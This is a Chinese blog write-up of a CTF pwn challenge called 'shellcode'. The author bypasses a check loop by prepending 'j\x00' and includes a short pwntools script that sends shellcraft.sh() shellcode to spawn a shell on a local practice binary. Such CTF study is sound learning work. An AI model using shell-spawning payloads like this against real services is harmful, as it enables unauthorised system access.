shellcode

今天来记录一下shellcode的新题

管他三七二十一常规操作

哦买噶竟然给开了 NX保护

但是莫慌莫慌    继续

 

 

看看逻辑找破绽 

发现了什么1.出现了mmap函数就去查

                   2.有判断条件就顺下去找漏洞

 

好的进去找,看看看看这不就是逻辑吗pwn他pwn他

 

 

 在里面循环判断判断

但是判断一下发现       重点是啥么,要是while(0),就可以绕开!!!!

好的啦


from pwn import*
context(os='linux', arch='amd64', log_level='debug')
io=process("./shellcode")
payload = 'j\x00'+asm(shellcraft.sh())
io.sendline(payload)
io.interactive()

 

 这就要来解释一下

我们需要把   0   地址,送进去sendline  要用到汇编语言

这三个知识点要了解一下:

       1.  context(os='linux', arch='amd64', log_level='debug')

  2.  asm(shellcraft.sh()

  3.  'j\x00'

 

 

好的,因为没有远程服务器就只能自己打自己

搞一个flag文件

 

 

posted @   lypp冲冲冲  阅读(209)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通

阅读目录(Content)

此页目录为空

/*每日诗词上*/
点击右上角即可分享
微信分享提示